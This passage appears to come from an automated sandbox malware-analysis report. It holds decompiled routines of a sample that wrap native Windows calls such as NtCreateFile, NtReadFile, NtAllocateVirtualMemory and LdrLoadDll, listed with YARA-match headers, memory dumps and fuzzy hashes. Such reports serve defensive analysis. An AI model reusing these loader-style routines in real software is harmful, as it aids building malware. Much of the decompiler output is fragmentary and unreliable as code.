                                                                                                                                                            			}





                                                                                                                                                            0x00419db9
                                                                                                                                                            0x00419dbe
                                                                                                                                                            0x00419dbf
                                                                                                                                                            0x00419dc0

                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: BMA$BMA$HA
                                                                                                                                                            • API String ID: 2738559852-181183267
                                                                                                                                                            • Opcode ID: 4a48234139a544930bac8349fa1b23d1940cfe565be2520cc49e0ad9496b62c9
                                                                                                                                                            • Instruction ID: 3e3ee1d868dada5ff74454793b5848170191f3d98e1e270987646d6814ebfa3b
                                                                                                                                                            • Opcode Fuzzy Hash: 4a48234139a544930bac8349fa1b23d1940cfe565be2520cc49e0ad9496b62c9
                                                                                                                                                            • Instruction Fuzzy Hash: 6921F9B6200108AFCB14DF99DC84EEB77A9EF8C714F158649BE1DA7241C630E851CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                            			E00419E0A(void* __edx, void* __edi, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            
                                                                                                                                                            				asm("xlatb");
                                                                                                                                                            				 *((char*)(__edi + 0x1a)) = 0x55;
                                                                                                                                                            				_t14 = _v0;
                                                                                                                                                            				_t4 = _t14 + 0xc48; // 0x656dec15
                                                                                                                                                            				_t32 = _t4;
                                                                                                                                                            				E0041A960(__edi, _t14, _t32,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
                                                                                                                                                            				_t7 =  &_a32; // 0x414d42
                                                                                                                                                            				_t13 =  &_a8; // 0x414d42
                                                                                                                                                            				_t19 =  *((intOrPtr*)( *_t32))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, _t31, _t34, __edi); // executed
                                                                                                                                                            				return _t19;
                                                                                                                                                            			}









                                                                                                                                                            0x00419e0a
                                                                                                                                                            0x00419e0d
                                                                                                                                                            0x00419e13
                                                                                                                                                            0x00419e1f
                                                                                                                                                            0x00419e1f
                                                                                                                                                            0x00419e27
                                                                                                                                                            0x00419e32
                                                                                                                                                            0x00419e4d
                                                                                                                                                            0x00419e55
                                                                                                                                                            0x00419e59

                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: BMA$BMA
                                                                                                                                                            • API String ID: 2738559852-2163208940
                                                                                                                                                            • Opcode ID: 9e717505c25a82cf4042bc2022fb971966de747259fbd9569fded4c9e304951c
                                                                                                                                                            • Instruction ID: aa9b5b214718aa6ebfe1a9c89e5d6a711ddeb18a2471c7d830735e57fc1e90b3
                                                                                                                                                            • Opcode Fuzzy Hash: 9e717505c25a82cf4042bc2022fb971966de747259fbd9569fded4c9e304951c
                                                                                                                                                            • Instruction Fuzzy Hash: AAF0E7B2214608ABCB14DF89DC80EEB77A9EF8C754F058649FA1D97241D630E9518BA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                            			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                            				void* _t18;
                                                                                                                                                            				void* _t27;
                                                                                                                                                            				void* _t28;
                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                            
                                                                                                                                                            				_t13 = _a4;
                                                                                                                                                            				_t3 = _t13 + 0xc48; // 0x656dec15
                                                                                                                                                            				_t29 = _t3;
                                                                                                                                                            				E0041A960(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                            				_t6 =  &_a32; // 0x414d42
                                                                                                                                                            				_t12 =  &_a8; // 0x414d42
                                                                                                                                                            				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
                                                                                                                                                            				return _t18;
                                                                                                                                                            			}








                                                                                                                                                            0x00419e13
                                                                                                                                                            0x00419e1f
                                                                                                                                                            0x00419e1f
                                                                                                                                                            0x00419e27
                                                                                                                                                            0x00419e32
                                                                                                                                                            0x00419e4d
                                                                                                                                                            0x00419e55
                                                                                                                                                            0x00419e59

                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: BMA$BMA
                                                                                                                                                            • API String ID: 2738559852-2163208940
                                                                                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                            • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                                                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                            • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216874701.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseResumeThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2308149497-0
                                                                                                                                                            • Opcode ID: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                            • Instruction ID: eeae34acc1f39b0d377a569621cb7c15a738069ec69dcd698e6233d72c39b1ab
                                                                                                                                                            • Opcode Fuzzy Hash: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                            • Instruction Fuzzy Hash: 2F218C31A14A498FCBA5EF68D8987AAB7E1FF88314F41052BE44EC7350EB749981C781
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0040ACD0(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                            				char* _v8;
                                                                                                                                                            				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                            				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                            				char _v536;
                                                                                                                                                            				void* _t15;
                                                                                                                                                            				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                            				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                            				void* _t32;
                                                                                                                                                            				void* _t33;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            
                                                                                                                                                            				_v8 =  &_v536;
                                                                                                                                                            				_t15 = E0041C650(_a8,  &_v12, 0x104, _a8);
                                                                                                                                                            				_t33 = _t32 + 0xc;
                                                                                                                                                            				if(_t15 != 0) {
                                                                                                                                                            					_t17 = E0041CA70(__eflags, _v8);
                                                                                                                                                            					_t34 = _t33 + 4;
                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                            						E0041CCF0(__ebx, __edi,  &_v12, 0);
                                                                                                                                                            						_t34 = _t34 + 8;
                                                                                                                                                            					}
                                                                                                                                                            					_t18 = E0041AEA0(_v8);
                                                                                                                                                            					_v16 = _t18;
                                                                                                                                                            					__eflags = _t18;
                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                            						return _v16;
                                                                                                                                                            					}
                                                                                                                                                            					return _t18;
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t15;
                                                                                                                                                            				}
                                                                                                                                                            			}













                                                                                                                                                            0x0040acec
                                                                                                                                                            0x0040acef
                                                                                                                                                            0x0040acf4
                                                                                                                                                            0x0040acf9
                                                                                                                                                            0x0040ad03
                                                                                                                                                            0x0040ad08
                                                                                                                                                            0x0040ad0b
                                                                                                                                                            0x0040ad0d
                                                                                                                                                            0x0040ad15
                                                                                                                                                            0x0040ad1a
                                                                                                                                                            0x0040ad1a
                                                                                                                                                            0x0040ad21
                                                                                                                                                            0x0040ad29
                                                                                                                                                            0x0040ad2c
                                                                                                                                                            0x0040ad2e
                                                                                                                                                            0x0040ad42
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0040ad44
                                                                                                                                                            0x0040ad4a
                                                                                                                                                            0x0040acfe
                                                                                                                                                            0x0040acfe
                                                                                                                                                            0x0040acfe

                                                                                                                                                            APIs
                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Load
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                            • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                                                                                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                            • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                            				long _t21;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            
                                                                                                                                                            				asm("in al, dx");
                                                                                                                                                            				_t15 = _a4;
                                                                                                                                                            				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                            				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                            				return _t21;
                                                                                                                                                            			}





                                                                                                                                                            0x00419d62
                                                                                                                                                            0x00419d63
                                                                                                                                                            0x00419d6f
                                                                                                                                                            0x00419d77
                                                                                                                                                            0x00419dad
                                                                                                                                                            0x00419db1

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                            • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                            • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E00419D62() {
                                                                                                                                                            				long _t21;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            				void* _t35;
                                                                                                                                                            
                                                                                                                                                            				asm("in al, dx");
                                                                                                                                                            				_t15 =  *((intOrPtr*)(_t35 + 8));
                                                                                                                                                            				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                            				E0041A960(_t31,  *((intOrPtr*)(_t35 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t35 + 8)) + 0x10)), 0, 0x28);
                                                                                                                                                            				_t21 = NtCreateFile( *(_t35 + 0xc),  *(_t35 + 0x10),  *(_t35 + 0x14),  *(_t35 + 0x18),  *(_t35 + 0x1c),  *(_t35 + 0x20),  *(_t35 + 0x24),  *(_t35 + 0x28),  *(_t35 + 0x2c),  *(_t35 + 0x30),  *(_t35 + 0x34)); // executed
                                                                                                                                                            				return _t21;
                                                                                                                                                            			}






                                                                                                                                                            0x00419d62
                                                                                                                                                            0x00419d63
                                                                                                                                                            0x00419d6f
                                                                                                                                                            0x00419d77
                                                                                                                                                            0x00419dad
                                                                                                                                                            0x00419db1

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                                                                            • Instruction ID: f9e75046ee5429152fd383a0d0cfac4a474c827aa4cf025705bab887161fcd11
                                                                                                                                                            • Opcode Fuzzy Hash: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                                                                            • Instruction Fuzzy Hash: 04F0CAB2201108AFCB08CF88DC84EEB37A9EF8C754F158248FA0DE7240C630E851CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                            			E00419D1C(void* __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                                                                                                                                                            				long _t27;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				void* _t47;
                                                                                                                                                            				intOrPtr* _t49;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            
                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                            					_t27 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                                                                                                            					return _t27;
                                                                                                                                                            				} else {
                                                                                                                                                            					asm("movsb");
                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                            					_t4 = _t28 + 0xc3c; // 0xc64
                                                                                                                                                            					_t49 = _t4;
                                                                                                                                                            					E0041A960(_t46, _a4, _t49,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
                                                                                                                                                            					return  *((intOrPtr*)( *_t49))(_a8, _a12, _a16, _a20, _a24, _t47, _t51);
                                                                                                                                                            				}
                                                                                                                                                            			}








                                                                                                                                                            0x00419d1d
                                                                                                                                                            0x00419dad
                                                                                                                                                            0x00419db1
                                                                                                                                                            0x00419d1f
                                                                                                                                                            0x00419d1f
                                                                                                                                                            0x00419d23
                                                                                                                                                            0x00419d2f
                                                                                                                                                            0x00419d2f
                                                                                                                                                            0x00419d37
                                                                                                                                                            0x00419d59
                                                                                                                                                            0x00419d59

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction ID: 9cd4676ba9c6a89dab0461fb7f4c452788ef1dc7d528fcf3db7cd70acc4c4bbd
                                                                                                                                                            • Opcode Fuzzy Hash: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction Fuzzy Hash: A7F092B2204009AF8B48CF8CDC91CEB73FAAF8C744B118208FA0DD3240D630EC518BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                            				long _t14;
                                                                                                                                                            				void* _t21;
                                                                                                                                                            
                                                                                                                                                            				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                            				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                            				return _t14;
                                                                                                                                                            			}





                                                                                                                                                            0x00419f4f
                                                                                                                                                            0x00419f57
                                                                                                                                                            0x00419f79
                                                                                                                                                            0x00419f7d

                                                                                                                                                            APIs
                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                            • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                                                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                            • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00419E90(intOrPtr _a4, void* _a8) {
                                                                                                                                                            				long _t8;
                                                                                                                                                            				void* _t11;
                                                                                                                                                            
                                                                                                                                                            				_t5 = _a4;
                                                                                                                                                            				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                            				_t3 = _t5 + 0xc50; // 0x40a923
                                                                                                                                                            				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                            				_t8 = NtClose(_a8); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}





                                                                                                                                                            0x00419e93
                                                                                                                                                            0x00419e96
                                                                                                                                                            0x00419e9f
                                                                                                                                                            0x00419ea7
                                                                                                                                                            0x00419eb5
                                                                                                                                                            0x00419eb9

                                                                                                                                                            APIs
                                                                                                                                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Close
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                            • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                                                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                            • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                            • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                            • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                            • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                            • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                            • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                            • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                            • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                            • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                            • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
